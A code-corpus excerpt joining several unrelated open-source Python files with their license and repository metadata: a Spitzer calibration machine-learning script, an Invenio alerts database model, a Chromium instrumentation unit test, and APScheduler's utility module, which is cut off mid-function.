inputData = dataRaw.copy()
for key in dataRaw.columns:
if key in PLDpixels.columns:
inputData[key] = PLDpixels[key]
if verbose:
testPLD = np.array(pd.DataFrame({key:inputData[key] for key in inputData.columns.values if 'pix' in key}))
assert(not sum(abs(testPLD - np.array(PLDpixels))).all())
print('Confirmed that PLD Pixels have been Normalized to Spec')
feature_columns = inputData.drop(notFeatures,axis=1).columns.values
features = inputData.drop(notFeatures,axis=1).values
labels = inputData['flux'].values
# **PCA Preconditioned Random Forest Approach**
if verbose: print('Performing PCA')
labels_scaled = label_scaler.transform(labels[:,None]).ravel() if label_scaler is not None else labels
features_scaled = feature_scaler.transform(features) if feature_scaler is not None else features
features_trnsfrmd = transformer.transform(features_scaled) if transformer is not None else features_scaled
return features_trnsfrmd, labels_scaled
files_in_directory = glob('./*')
# nRF_modes = 6
# perform_rf_mode = np.ones(nRF_modes, dtype=bool)
#
# set_of_save_files = ['./randForest_STD_approach.save',
# './randForest_PCA_approach.save',
# './randForest_ICA_approach.save',
# './randForest_RFI_approach.save',
# './randForest_RFI_PCA_approach.save',
# './randForest_RFI_ICA_approach.save']
#
# for k, sfile in enumerate(set_of_save_files):
# if sfile in files_in_directory:
# perform_rf_mode[k] = False
# ## Load CSVs data
spitzerCalNotFeatures = ['flux', 'fluxerr', 'dn_peak', 'xycov', 't_cernox', 'xerr', 'yerr', 'sigma_bg_flux']
spitzerCalFilename ='pmap_ch2_0p1s_x4_rmulti_s3_7.csv'
spitzerCalRawData = pd.read_csv(spitzerCalFilename)
spitzerCalRawData['fluxerr'] = spitzerCalRawData['fluxerr'] / np.median(spitzerCalRawData['flux'].values)
spitzerCalRawData['bg_flux'] = spitzerCalRawData['bg_flux'] / np.median(spitzerCalRawData['flux'].values)
spitzerCalRawData['sigma_bg_flux'] = spitzerCalRawData['sigma_bg_flux']/ np.median(spitzerCalRawData['flux'].values)
spitzerCalRawData['flux'] = spitzerCalRawData['flux'] / np.median(spitzerCalRawData['flux'].values)
spitzerCalRawData['bmjd_err'] = np.median(0.5*np.diff(spitzerCalRawData['bmjd']))
spitzerCalRawData['np_err'] = np.sqrt(spitzerCalRawData['yerr'])
n_PLD = 9
n_resamp= args['n_resamp']
resampling_inputs = ['flux', 'xpos', 'ypos', 'xfwhm', 'yfwhm', 'bg_flux', 'bmjd', 'np'] + ['pix{}'.format(k) for k in range(1,10)]
resampling_errors = ['fluxerr', 'xerr', 'yerr', 'xerr', 'yerr', 'sigma_bg_flux', 'bmjd_err', 'np_err'] + ['fluxerr']*n_PLD
spitzerCalResampled = {}
if n_resamp > 0:
print('Starting Resampling')
for colname, colerr in tqdm(zip(resampling_inputs, resampling_errors), total=len(resampling_inputs)):
if 'pix' in colname:
spitzerCalResampled[colname] = np.random.normal(spitzerCalRawData[colname], spitzerCalRawData[colname]*spitzerCalRawData['fluxerr'], size=(n_resamp,len(spitzerCalRawData))).flatten()
else:
spitzerCalResampled[colname] = np.random.normal(spitzerCalRawData[colname], spitzerCalRawData[colerr], size=(n_resamp,len(spitzerCalRawData))).flatten()
spitzerCalResampled = pd.DataFrame(spitzerCalResampled)
else:
print('No Resampling')
spitzerCalResampled = pd.DataFrame({colname:spitzerCalRawData[colname] for colname, colerr in tqdm(zip(resampling_inputs, resampling_errors), total=len(resampling_inputs))})
features_SSscaled, labels_SSscaled = setup_features(dataRaw = spitzerCalResampled,
notFeatures = [],#spitzerCalNotFeatures,
transformer = PCA(whiten=True), # THIS IS PCA-RF -- NOT DEFAULT
feature_scaler= StandardScaler(),
label_scaler = None,
verbose = True,
returnAll = None)
pca_cal_features_SSscaled = features_SSscaled
nTrees = args['n_trees']
start = time()
print('Grabbing PCA', end=" ")
pca_cal_features_SSscaled, labels_SSscaled, spitzerCalRawData, \
pca_trnsfrmr, label_sclr, feature_sclr = setup_features(dataRaw = spitzerCalResampled,
notFeatures = [],#spitzerCalNotFeatures,
transformer = None,
feature_scaler= StandardScaler(),
label_scaler = None,
verbose = True,
returnAll = True)
print(len(pca_cal_features_SSscaled))
print('took {} seconds'.format(time() - start))
if 'core' in args.keys():
core = args['core']
else:
from glob import glob
existing_saves = glob('randForest_GBR_PCA_approach_{}trees_{}resamp_*core.save'.format(nTrees, n_resamp))
core_nums = []
for fname in existing_saves:
        core_nums.append(int(fname.split('randForest_GBR_PCA_approach_{}trees_{}resamp_'.format(nTrees, n_resamp))[-1].split('core.save')[0]))
    core = max(core_nums) + 1 if core_nums else 0
label_sclr_save_name = 'spitzerCalLabelScaler_fit_{}resamp_{}core.save'.format(n_resamp, core)
feature_sclr_save_name = 'spitzerCalFeatureScaler_fit_{}resamp_{}core.save'.format(n_resamp, core)
pca_trnsfrmr_save_name = 'spitzerCalFeaturePCA_trnsfrmr_{}resamp_{}core.save'.format(n_resamp, core)
save_calibration_stacks = False
if label_sclr_save_name not in files_in_directory and label_sclr is not None: save_calibration_stacks = True
if feature_sclr_save_name not in files_in_directory and feature_sclr is not None: save_calibration_stacks = True
if pca_trnsfrmr_save_name not in files_in_directory and pca_trnsfrmr is not None: save_calibration_stacks = True
if save_calibration_stacks:
# *** For production level usage ***
# All scaling and transformations must be done with respect to the calibration data distributions
# - That means to use .transform instead of .fit_transform
# - See `predict_with_scaled_transformer`
# Need to Scale the Labels based off of the calibration distribution
joblib.dump(label_sclr , label_sclr_save_name)
# Need to Scale the Features based off of the calibration distribution
joblib.dump(feature_sclr, feature_sclr_save_name)
# Need to Transform the Scaled Features based off of the calibration distribution
joblib.dump(pca_trnsfrmr, pca_trnsfrmr_save_name)
if do_pca:
print('Performing PCA Random Forest')
randForest_PCA = RandomForestRegressor( n_estimators=nTrees,
n_jobs=n_jobs,
criterion='mse',
max_depth=None,
min_samples_split=2,
min_samples_leaf=1,
min_weight_fraction_leaf=0.0,
max_features='auto',
max_leaf_nodes=None,
bootstrap=True,
oob_score=True,
# random_state=random_state,
verbose=True,
warm_start=True)
print('Feature Shape: {}\nLabel Shape: {}'.format(pca_cal_features_SSscaled.shape, labels_SSscaled.shape))
start=time()
randForest_PCA.fit(pca_cal_features_SSscaled, labels_SSscaled)
randForest_PCA_oob = randForest_PCA.oob_score_
randForest_PCA_pred= randForest_PCA.predict(pca_cal_features_SSscaled)
randForest_PCA_Rsq = r2_score(labels_SSscaled, randForest_PCA_pred)
print('PCA Pretrained Random Forest:\n\tOOB Score: {:.3f}%\n\tR^2 score: {:.3f}%\n\tRuntime: {:.3f} seconds'.format(randForest_PCA_oob*100, randForest_PCA_Rsq*100, time()-start))
joblib.dump(randForest_PCA, 'randForest_PCA_approach_{}trees_{}resamp.save'.format(nTrees, n_resamp))
if need_gc:
del randForest_PCA, randForest_PCA_pred
gc.collect();
if do_gbr:
trainX, testX, trainY, testY = train_test_split(pca_cal_features_SSscaled, labels_SSscaled, test_size=0.25)
print('Performing Gradient Boosting Regression with PCA Random Forest and Quantile Loss')
randForest_PCA_GBR = GradientBoostingRegressor(loss='quantile',
learning_rate=0.1,
n_estimators=nTrees,
# n_jobs=n_jobs,
# bootstrap=True,
# oob_score=True,
subsample=1.0,
criterion='friedman_mse',
min_samples_split=2,
min_samples_leaf=1,
min_weight_fraction_leaf=0.0,
max_depth=3,#None,
min_impurity_decrease=0.0,
min_impurity_split=None,
init=None,
# random_state=42,
max_features='auto',
alpha=0.9,
verbose=True,
max_leaf_nodes=None,
warm_start=True,
presort='auto')
print(pca_cal_features_SSscaled.shape, labels_SSscaled.shape)
start=time()
randForest_PCA_GBR.fit(trainX, trainY)
randForest_PCA_GBR_pred_train = randForest_PCA_GBR.predict(trainX)
randForest_PCA_GBR_pred_test = randForest_PCA_GBR.predict(testX)
randForest_PCA_GBR_Rsq_train = r2_score(trainY, randForest_PCA_GBR_pred_train)
randForest_PCA_GBR_Rsq_test = r2_score(testY , randForest_PCA_GBR_pred_test )
print('PCA Pretrained Random Forest:\n\tTrain R^2 Score: {:.3f}%\n\tTest R^2 score: {:.3f}%\n\tRuntime: {:.3f} seconds'.format(
randForest_PCA_GBR_Rsq_train*100, randForest_PCA_GBR_Rsq_test*100, time()-start))
joblib.dump(randForest_PCA_GBR, 'randForest_GBR_PCA_approach_{}trees_{}resamp_{}core.save'.format(nTrees, n_resamp, core))
if need_gc:
        del randForest_PCA_GBR, randForest_PCA_GBR_pred_train, randForest_PCA_GBR_pred_test
gc.collect();
if do_std:
# **Standard Random Forest Approach**
# for nComps in range(1,spitzerData.shape[1]):
print('Performing STD Random Forest')
randForest_STD = RandomForestRegressor( n_estimators=nTrees, \
n_jobs=n_jobs, \
criterion='mse', \
max_depth=None, \
min_samples_split=2, \
min_samples_leaf=1, \
min_weight_fraction_leaf=0.0, \
max_features='auto', \
max_leaf_nodes=None, \
bootstrap=True, \
oob_score=True, \
# random_state=42, \
verbose=True, \
warm_start=True)
start=time()
randForest_STD.fit(features_SSscaled, labels_SSscaled)
# Save for Later
importances = randForest_STD.feature_importances_
np.savetxt(importance_filename, importances)
randForest_STD_oob = randForest_STD.oob_score_
randForest_STD_pred= randForest_STD.predict(features_SSscaled)
randForest_STD_Rsq = r2_score(labels_SSscaled, randForest_STD_pred)
print('Standard Random Forest:\n\tOOB Score: {:.3f}%\n\tR^2 score: {:.3f}%\n\tRuntime: {:.3f} seconds'.format(randForest_STD_oob*100, randForest_STD_Rsq*100, time()-start))
joblib.dump(randForest_STD, 'randForest_STD_approach_{}trees_{}resamp.save'.format(nTrees, n_resamp))
if need_gc:
del randForest_STD, randForest_STD_pred
gc.collect();
if do_ica:
# for nComps in range(1,spitzerData.shape[1]):
print('Performing ICA Random Forest')
start = time()
print('Performing ICA', end=" ")
ica_cal_feature_set = setup_features(dataRaw = spitzerCalResampled,
notFeatures = spitzerCalNotFeatures,
transformer = FastICA(),
feature_scaler= StandardScaler(),
label_scaler = None,
verbose = True,
returnAll = 'features')
print('took {} seconds'.format(time() - start))
randForest_ICA = RandomForestRegressor( n_estimators=nTrees,
criterion='mse',
max_depth=None,
min_samples_split=2,
min_samples_leaf=1,
min_weight_fraction_leaf=0.0,
max_features='auto',
max_leaf_nodes=None,
bootstrap=True,
oob_score=True,
n_jobs=n_jobs,
# random_state=42,
verbose=True,
warm_start=True)
start=time()
randForest_ICA.fit(ica_cal_feature_set, labels_SSscaled)
randForest_ICA_oob = randForest_ICA.oob_score_
randForest_ICA_pred= randForest_ICA.predict(ica_cal_feature_set)
randForest_ICA_Rsq = r2_score(labels_SSscaled, randForest_ICA_pred)
print('ICA Pretrained Random Forest:\n\tOOB Score: {:.3f}%\n\tR^2 score: {:.3f}%\n\tRuntime: {:.3f} seconds'.format(randForest_ICA_oob*100, randForest_ICA_Rsq*100, time()-start))
joblib.dump(randForest_ICA, 'randForest_ICA_approach_{}trees_{}resamp.save'.format(nTrees, n_resamp))
if need_gc:
del randForest_ICA, randForest_ICA_oob, randForest_ICA_pred, randForest_ICA_Rsq
gc.collect();
if do_rfi:
# **Importance Sampling**
print('Computing Importances for RFI Random Forest')
importances = np.loadtxt(importance_filename)
indices = np.argsort(importances)[::-1]
cumsum = np.cumsum(importances[indices])
nImportantSamples = np.argmax(cumsum >= 0.95) + 1
# **Random Forest Pretrained Random Forest Approach**
rfi_cal_feature_set = features_SSscaled.T[indices][:nImportantSamples].T
# for nComps in range(1,spitzerData.shape[1]):
print('Performing RFI Random Forest')
randForest_RFI = RandomForestRegressor( n_estimators=nTrees, \
n_jobs=n_jobs, \
criterion='mse', \
max_depth=None, \
min_samples_split=2, \
min_samples_leaf=1, \
min_weight_fraction_leaf=0.0, \
max_features='auto', \
max_leaf_nodes=None, \
bootstrap=True, \
oob_score=True, \
# random_state=42, \
verbose=True, \
warm_start=True)
start=time()
randForest_RFI.fit(rfi_cal_feature_set, labels_SSscaled)
randForest_RFI_oob = randForest_RFI.oob_score_
randForest_RFI_pred= randForest_RFI.predict(rfi_cal_feature_set)
randForest_RFI_Rsq = r2_score(labels_SSscaled, randForest_RFI_pred)
print('RFI Pretrained Random Forest:\n\tOOB Score: {:.3f}%\n\tR^2 score: {:.3f}%\n\tRuntime: {:.3f} seconds'.format(randForest_RFI_oob*100, randForest_RFI_Rsq*100, time()-start))
joblib.dump(randForest_RFI, 'randForest_RFI_approach_{}trees_{}resamp.save'.format(nTrees, n_resamp))
if need_gc:
del randForest_RFI, randForest_RFI_oob, randForest_RFI_pred, randForest_RFI_Rsq
gc.collect();
do_rfi_pca=False
if do_rfi_pca:
# **PCA Pretrained Random Forest Approach**
print('Performing PCA on RFI', end=" ")
start = time()
pca = PCA(whiten=True)
pca_rfi_cal_feature_set = pca.fit_transform(rfi_cal_feature_set)
print('took {} seconds'.format(time() - start))
print('Performing RFI with PCA Random Forest')
randForest_RFI_PCA = RandomForestRegressor( n_estimators=nTrees,
criterion='mse',
max_depth=None,
min_samples_split=2,
min_samples_leaf=1,
min_weight_fraction_leaf=0.0,
max_features='auto',
max_leaf_nodes=None,
bootstrap=True,
oob_score=True,
n_jobs=n_jobs,
# random_state=42,
verbose=True,
warm_start=True)
start=time()
randForest_RFI_PCA.fit(pca_rfi_cal_feature_set, labels_SSscaled)
randForest_RFI_PCA_oob = randForest_RFI_PCA.oob_score_
randForest_RFI_PCA_pred= randForest_RFI_PCA.predict(pca_rfi_cal_feature_set)
randForest_RFI_PCA_Rsq = r2_score(labels_SSscaled, randForest_RFI_PCA_pred)
print('RFI Pretrained with PCA Random Forest:\n\tOOB Score: {:.3f}%\n\tR^2 score: {:.3f}%\n\tRuntime: {:.3f} seconds'.format(
randForest_RFI_PCA_oob*100, randForest_RFI_PCA_Rsq*100, time()-start))
joblib.dump(randForest_RFI_PCA, 'randForest_RFI_PCA_approach_{}trees_{}resamp.save'.format(nTrees, n_resamp))
if need_gc:
del randForest_RFI_PCA, randForest_RFI_PCA_oob, randForest_RFI_PCA_pred, randForest_RFI_PCA_Rsq
gc.collect();
do_rfi_ica = False
if do_rfi_ica:
# **ICA Pretrained Random Forest Approach**
print('Performing ICA on RFI', end=" ")
ica = FastICA()
start = time()
ica_rfi_cal_feature_set = ica.fit_transform(rfi_cal_feature_set)
print('took {} seconds'.format(time() - start))
print('Performing RFI with ICA Random Forest')
randForest_RFI_ICA = RandomForestRegressor( n_estimators=nTrees,
criterion='mse',
max_depth=None,
min_samples_split=2,
min_samples_leaf=1,
min_weight_fraction_leaf=0.0,
max_features='auto',
max_leaf_nodes=None,
bootstrap=True,
oob_score=True,
n_jobs=n_jobs,
# random_state=42,
verbose=True,
warm_start=True)
start=time()
randForest_RFI_ICA.fit(ica_rfi_cal_feature_set, labels_SSscaled)
randForest_RFI_ICA_oob = randForest_RFI_ICA.oob_score_
randForest_RFI_ICA_pred= randForest_RFI_ICA.predict(ica_rfi_cal_feature_set)
randForest_RFI_ICA_Rsq = r2_score(labels_SSscaled, randForest_RFI_ICA_pred)
print('RFI Pretrained with ICA Random Forest:\n\tOOB Score: {:.3f}%\n\tR^2 score: {:.3f}%\n\tRuntime: {:.3f} seconds'.format(
randForest_RFI_ICA_oob*100, randForest_RFI_ICA_Rsq*100, time()-start))
joblib.dump(randForest_RFI_ICA, 'randForest_RFI_ICA_approach_{}trees_{}resamp.save'.format(nTrees, n_resamp))
if need_gc:
del randForest_RFI_ICA, randForest_RFI_ICA_oob, randForest_RFI_ICA_pred, randForest_RFI_ICA_Rsq
gc.collect();
print('\n\nFull Operation took {:.2f} minutes'.format((time() - start0)/60))
if pdb_stop: pdb.set_trace()
|
mit
|
SDSG-Invenio/invenio
|
invenio/modules/alerts/models.py
|
13
|
2619
|
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2011, 2012, 2014 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""Alert database models."""
# General imports.
from invenio.ext.sqlalchemy import db
# Create your models here.
from invenio.modules.accounts.models import User
from invenio.modules.baskets.models import BskBASKET
from invenio.modules.search.models import WebQuery
class UserQueryBasket(db.Model):
"""Represent a UserQueryBasket record."""
__tablename__ = 'user_query_basket'
id_user = db.Column(db.Integer(15, unsigned=True),
db.ForeignKey(User.id), nullable=False,
server_default='0', primary_key=True)
id_query = db.Column(db.Integer(15, unsigned=True),
db.ForeignKey(WebQuery.id), nullable=False,
server_default='0', primary_key=True,
index=True)
id_basket = db.Column(db.Integer(15, unsigned=True),
db.ForeignKey(BskBASKET.id), nullable=False,
server_default='0', primary_key=True,
index=True)
frequency = db.Column(db.String(5), nullable=False, server_default='',
primary_key=True)
date_creation = db.Column(db.Date, nullable=True)
date_lastrun = db.Column(db.Date, nullable=True,
server_default='1900-01-01')
alert_name = db.Column(db.String(30), nullable=False,
server_default='', index=True)
alert_desc = db.Column(db.Text)
alert_recipient = db.Column(db.Text)
notification = db.Column(db.Char(1), nullable=False,
server_default='y')
user = db.relationship(User, backref='query_baskets')
webquery = db.relationship(WebQuery, backref='user_baskets')
basket = db.relationship(BskBASKET, backref='user_queries')
__all__ = ('UserQueryBasket', )
|
gpl-2.0
|
was4444/chromium.src
|
build/android/pylib/instrumentation/instrumentation_test_instance_test.py
|
16
|
3588
|
#!/usr/bin/env python
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Unit tests for instrumentation.TestRunner."""
import unittest
from pylib.base import base_test_result
from pylib.constants import host_paths
from pylib.instrumentation import instrumentation_test_instance
with host_paths.SysPath(host_paths.PYMOCK_PATH):
import mock # pylint: disable=import-error
class InstrumentationTestInstanceTest(unittest.TestCase):
def setUp(self):
options = mock.Mock()
options.tool = ''
def testGenerateTestResults_noStatus(self):
results = instrumentation_test_instance.GenerateTestResults(
None, None, [], 0, 1000)
self.assertEqual([], results)
def testGenerateTestResults_testPassed(self):
statuses = [
(1, {
'class': 'test.package.TestClass',
'test': 'testMethod',
}),
(0, {
'class': 'test.package.TestClass',
'test': 'testMethod',
}),
]
results = instrumentation_test_instance.GenerateTestResults(
None, None, statuses, 0, 1000)
self.assertEqual(1, len(results))
self.assertEqual(base_test_result.ResultType.PASS, results[0].GetType())
def testGenerateTestResults_testSkipped_true(self):
statuses = [
(1, {
'class': 'test.package.TestClass',
'test': 'testMethod',
}),
(0, {
'test_skipped': 'true',
'class': 'test.package.TestClass',
'test': 'testMethod',
}),
(0, {
'class': 'test.package.TestClass',
'test': 'testMethod',
}),
]
results = instrumentation_test_instance.GenerateTestResults(
None, None, statuses, 0, 1000)
self.assertEqual(1, len(results))
self.assertEqual(base_test_result.ResultType.SKIP, results[0].GetType())
def testGenerateTestResults_testSkipped_false(self):
statuses = [
(1, {
'class': 'test.package.TestClass',
'test': 'testMethod',
}),
(0, {
'test_skipped': 'false',
}),
(0, {
'class': 'test.package.TestClass',
'test': 'testMethod',
}),
]
results = instrumentation_test_instance.GenerateTestResults(
None, None, statuses, 0, 1000)
self.assertEqual(1, len(results))
self.assertEqual(base_test_result.ResultType.PASS, results[0].GetType())
def testGenerateTestResults_testFailed(self):
statuses = [
(1, {
'class': 'test.package.TestClass',
'test': 'testMethod',
}),
(-2, {
'class': 'test.package.TestClass',
'test': 'testMethod',
}),
]
results = instrumentation_test_instance.GenerateTestResults(
None, None, statuses, 0, 1000)
self.assertEqual(1, len(results))
self.assertEqual(base_test_result.ResultType.FAIL, results[0].GetType())
def testGenerateTestResults_testUnknownException(self):
stacktrace = 'long\nstacktrace'
statuses = [
(1, {
'class': 'test.package.TestClass',
'test': 'testMethod',
}),
(-1, {
'class': 'test.package.TestClass',
'test': 'testMethod',
'stack': stacktrace,
}),
]
results = instrumentation_test_instance.GenerateTestResults(
None, None, statuses, 0, 1000)
self.assertEqual(1, len(results))
self.assertEqual(base_test_result.ResultType.FAIL, results[0].GetType())
self.assertEqual(stacktrace, results[0].GetLog())
if __name__ == '__main__':
unittest.main(verbosity=2)
|
bsd-3-clause
|
jroyal/plexpy
|
lib/apscheduler/util.py
|
32
|
12956
|
"""This module contains several handy functions primarily meant for internal use."""
from __future__ import division
from datetime import date, datetime, time, timedelta, tzinfo
from inspect import isfunction, ismethod, getargspec
from calendar import timegm
import re
from pytz import timezone, utc
import six
try:
from inspect import signature
except ImportError: # pragma: nocover
try:
from funcsigs import signature
except ImportError:
signature = None
__all__ = ('asint', 'asbool', 'astimezone', 'convert_to_datetime', 'datetime_to_utc_timestamp',
'utc_timestamp_to_datetime', 'timedelta_seconds', 'datetime_ceil', 'get_callable_name', 'obj_to_ref',
'ref_to_obj', 'maybe_ref', 'repr_escape', 'check_callable_args')
class _Undefined(object):
def __nonzero__(self):
return False
def __bool__(self):
return False
def __repr__(self):
return '<undefined>'
undefined = _Undefined() #: a unique object that only signifies that no value is defined
def asint(text):
"""
Safely converts a string to an integer, returning None if the string is None.
:type text: str
:rtype: int
"""
if text is not None:
return int(text)
def asbool(obj):
"""
Interprets an object as a boolean value.
:rtype: bool
"""
if isinstance(obj, str):
obj = obj.strip().lower()
if obj in ('true', 'yes', 'on', 'y', 't', '1'):
return True
if obj in ('false', 'no', 'off', 'n', 'f', '0'):
return False
raise ValueError('Unable to interpret value "%s" as boolean' % obj)
return bool(obj)
def astimezone(obj):
"""
Interprets an object as a timezone.
:rtype: tzinfo
"""
if isinstance(obj, six.string_types):
return timezone(obj)
if isinstance(obj, tzinfo):
if not hasattr(obj, 'localize') or not hasattr(obj, 'normalize'):
raise TypeError('Only timezones from the pytz library are supported')
if obj.zone == 'local':
raise ValueError('Unable to determine the name of the local timezone -- use an explicit timezone instead')
return obj
if obj is not None:
raise TypeError('Expected tzinfo, got %s instead' % obj.__class__.__name__)
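# Illustrative examples (not part of the library):
#
#   astimezone('Europe/London')   # string -> pytz timezone instance
#   astimezone(utc)               # pytz tzinfo passes through unchanged
#   astimezone(None)              # None passes through (returns None)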
_DATE_REGEX = re.compile(
r'(?P<year>\d{4})-(?P<month>\d{1,2})-(?P<day>\d{1,2})'
r'(?: (?P<hour>\d{1,2}):(?P<minute>\d{1,2}):(?P<second>\d{1,2})'
r'(?:\.(?P<microsecond>\d{1,6}))?)?')
def convert_to_datetime(input, tz, arg_name):
"""
Converts the given object to a timezone aware datetime object.
If a timezone aware datetime object is passed, it is returned unmodified.
If a native datetime object is passed, it is given the specified timezone.
If the input is a string, it is parsed as a datetime with the given timezone.
    Date strings are accepted in three different forms: date only (Y-m-d),
    date with time (Y-m-d H:M:S), or date with time and microseconds
    (Y-m-d H:M:S.micro).
:param str|datetime input: the datetime or string to convert to a timezone aware datetime
:param datetime.tzinfo tz: timezone to interpret ``input`` in
:param str arg_name: the name of the argument (used in an error message)
:rtype: datetime
"""
if input is None:
return
elif isinstance(input, datetime):
datetime_ = input
elif isinstance(input, date):
datetime_ = datetime.combine(input, time())
elif isinstance(input, six.string_types):
m = _DATE_REGEX.match(input)
if not m:
raise ValueError('Invalid date string')
values = [(k, int(v or 0)) for k, v in m.groupdict().items()]
values = dict(values)
datetime_ = datetime(**values)
else:
raise TypeError('Unsupported type for %s: %s' % (arg_name, input.__class__.__name__))
if datetime_.tzinfo is not None:
return datetime_
if tz is None:
raise ValueError('The "tz" argument must be specified if %s has no timezone information' % arg_name)
if isinstance(tz, six.string_types):
tz = timezone(tz)
try:
return tz.localize(datetime_, is_dst=None)
except AttributeError:
raise TypeError('Only pytz timezones are supported (need the localize() and normalize() methods)')
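# Illustrative examples (not part of the library): the three accepted string forms.
#
#   convert_to_datetime('2016-05-01', utc, 'run_date')                 # date only
#   convert_to_datetime('2016-05-01 12:30:00', utc, 'run_date')        # date and time
#   convert_to_datetime('2016-05-01 12:30:00.000500', utc, 'run_date') # with microseconds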
def datetime_to_utc_timestamp(timeval):
"""
Converts a datetime instance to a timestamp.
:type timeval: datetime
:rtype: float
"""
if timeval is not None:
return timegm(timeval.utctimetuple()) + timeval.microsecond / 1000000
def utc_timestamp_to_datetime(timestamp):
"""
Converts the given timestamp to a datetime instance.
:type timestamp: float
:rtype: datetime
"""
if timestamp is not None:
return datetime.fromtimestamp(timestamp, utc)
def timedelta_seconds(delta):
"""
Converts the given timedelta to seconds.
:type delta: timedelta
:rtype: float
"""
return delta.days * 24 * 60 * 60 + delta.seconds + \
delta.microseconds / 1000000.0
def datetime_ceil(dateval):
"""
Rounds the given datetime object upwards.
:type dateval: datetime
"""
if dateval.microsecond > 0:
return dateval + timedelta(seconds=1, microseconds=-dateval.microsecond)
return dateval
def datetime_repr(dateval):
return dateval.strftime('%Y-%m-%d %H:%M:%S %Z') if dateval else 'None'
def get_callable_name(func):
"""
Returns the best available display name for the given function/callable.
:rtype: str
"""
# the easy case (on Python 3.3+)
if hasattr(func, '__qualname__'):
return func.__qualname__
# class methods, bound and unbound methods
f_self = getattr(func, '__self__', None) or getattr(func, 'im_self', None)
if f_self and hasattr(func, '__name__'):
f_class = f_self if isinstance(f_self, type) else f_self.__class__
else:
f_class = getattr(func, 'im_class', None)
if f_class and hasattr(func, '__name__'):
return '%s.%s' % (f_class.__name__, func.__name__)
# class or class instance
if hasattr(func, '__call__'):
# class
if hasattr(func, '__name__'):
return func.__name__
# instance of a class with a __call__ method
return func.__class__.__name__
raise TypeError('Unable to determine a name for %r -- maybe it is not a callable?' % func)
def obj_to_ref(obj):
"""
Returns the path to the given object.
:rtype: str
"""
try:
ref = '%s:%s' % (obj.__module__, get_callable_name(obj))
obj2 = ref_to_obj(ref)
if obj != obj2:
raise ValueError
except Exception:
raise ValueError('Cannot determine the reference to %r' % obj)
return ref
def ref_to_obj(ref):
"""
Returns the object pointed to by ``ref``.
:type ref: str
"""
if not isinstance(ref, six.string_types):
raise TypeError('References must be strings')
if ':' not in ref:
raise ValueError('Invalid reference')
modulename, rest = ref.split(':', 1)
try:
obj = __import__(modulename)
except ImportError:
raise LookupError('Error resolving reference %s: could not import module' % ref)
try:
for name in modulename.split('.')[1:] + rest.split('.'):
obj = getattr(obj, name)
return obj
except Exception:
raise LookupError('Error resolving reference %s: error looking up object' % ref)
def maybe_ref(ref):
"""
Returns the object that the given reference points to, if it is indeed a reference.
If it is not a reference, the object is returned as-is.
"""
if not isinstance(ref, str):
return ref
return ref_to_obj(ref)
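# Illustrative sketch (not part of the library): obj_to_ref() and ref_to_obj()
# round-trip between an importable callable and its textual reference, e.g.
# something like 'apscheduler.util:timedelta_seconds'.
#
#   ref = obj_to_ref(timedelta_seconds)
#   assert ref_to_obj(ref) is timedelta_seconds
#   assert maybe_ref(timedelta_seconds) is timedelta_seconds  # non-strings pass through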
if six.PY2:
def repr_escape(string):
if isinstance(string, six.text_type):
return string.encode('ascii', 'backslashreplace')
return string
else:
repr_escape = lambda string: string
def check_callable_args(func, args, kwargs):
"""
Ensures that the given callable can be called with the given arguments.
:type args: tuple
:type kwargs: dict
"""
pos_kwargs_conflicts = [] # parameters that have a match in both args and kwargs
positional_only_kwargs = [] # positional-only parameters that have a match in kwargs
unsatisfied_args = [] # parameters in signature that don't have a match in args or kwargs
unsatisfied_kwargs = [] # keyword-only arguments that don't have a match in kwargs
unmatched_args = list(args) # args that didn't match any of the parameters in the signature
unmatched_kwargs = list(kwargs) # kwargs that didn't match any of the parameters in the signature
has_varargs = has_var_kwargs = False # indicates if the signature defines *args and **kwargs respectively
if signature:
try:
sig = signature(func)
except ValueError:
return # signature() doesn't work against every kind of callable
for param in six.itervalues(sig.parameters):
if param.kind == param.POSITIONAL_OR_KEYWORD:
if param.name in unmatched_kwargs and unmatched_args:
pos_kwargs_conflicts.append(param.name)
elif unmatched_args:
del unmatched_args[0]
elif param.name in unmatched_kwargs:
unmatched_kwargs.remove(param.name)
elif param.default is param.empty:
unsatisfied_args.append(param.name)
elif param.kind == param.POSITIONAL_ONLY:
if unmatched_args:
del unmatched_args[0]
elif param.name in unmatched_kwargs:
unmatched_kwargs.remove(param.name)
positional_only_kwargs.append(param.name)
elif param.default is param.empty:
unsatisfied_args.append(param.name)
elif param.kind == param.KEYWORD_ONLY:
if param.name in unmatched_kwargs:
unmatched_kwargs.remove(param.name)
elif param.default is param.empty:
unsatisfied_kwargs.append(param.name)
elif param.kind == param.VAR_POSITIONAL:
has_varargs = True
elif param.kind == param.VAR_KEYWORD:
has_var_kwargs = True
else:
if not isfunction(func) and not ismethod(func) and hasattr(func, '__call__'):
func = func.__call__
try:
argspec = getargspec(func)
except TypeError:
            return  # getargspec() doesn't work with certain callables
argspec_args = argspec.args if not ismethod(func) else argspec.args[1:]
has_varargs = bool(argspec.varargs)
has_var_kwargs = bool(argspec.keywords)
for arg, default in six.moves.zip_longest(argspec_args, argspec.defaults or (), fillvalue=undefined):
if arg in unmatched_kwargs and unmatched_args:
pos_kwargs_conflicts.append(arg)
elif unmatched_args:
del unmatched_args[0]
elif arg in unmatched_kwargs:
unmatched_kwargs.remove(arg)
elif default is undefined:
unsatisfied_args.append(arg)
# Make sure there are no conflicts between args and kwargs
if pos_kwargs_conflicts:
raise ValueError('The following arguments are supplied in both args and kwargs: %s' %
', '.join(pos_kwargs_conflicts))
# Check if keyword arguments are being fed to positional-only parameters
if positional_only_kwargs:
raise ValueError('The following arguments cannot be given as keyword arguments: %s' %
', '.join(positional_only_kwargs))
# Check that the number of positional arguments minus the number of matched kwargs matches the argspec
if unsatisfied_args:
raise ValueError('The following arguments have not been supplied: %s' % ', '.join(unsatisfied_args))
# Check that all keyword-only arguments have been supplied
if unsatisfied_kwargs:
